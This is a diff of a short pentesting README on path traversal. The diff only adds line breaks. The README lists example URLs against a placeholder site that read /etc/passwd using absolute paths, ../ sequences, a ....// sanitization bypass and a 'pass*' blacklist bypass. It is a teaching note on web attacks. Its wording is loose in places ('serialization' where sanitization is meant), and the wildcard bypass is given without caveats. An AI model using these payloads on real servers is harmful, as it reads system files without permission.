PentesterArchive/Hacking-Web/Path traversal/Readme.md

 # Path traversal Types and Serialization.
 ## Absolut Path traversal.
-In this type of Path traversal, results can be obtained by using the absolute path:
+In this type of Path traversal, results can be obtained by using the absolute path:<br />
 `https://insecure-website.com/loadImage?filename=/etc/passwd`

 ## Relative Path traversal.
 `https://insecure-website.com/loadImage?filename=../../../etc/passwd`

 ## Non-Recursive Sanitization Traversal
 In some cases, serialization techniques detect the path `../` and delete it.
-We can bypass this by doubling it and using `....//`:
+We can bypass this by doubling it and using `....//`:<br />
 `https://insecure-website.com/loadImage?filename=....//....//....//....//etc/passwd`

 ## Black list bypass
 In other cases the server may have a black list that find some maches and invalidate them like `passwd`.
-We can bypass it using regular expresions `pass*`:
+We can bypass it using regular expresions `pass*`: <br />
 `https://insecure-website.com/loadImage?filename=....//....//....//....//etc/pass*`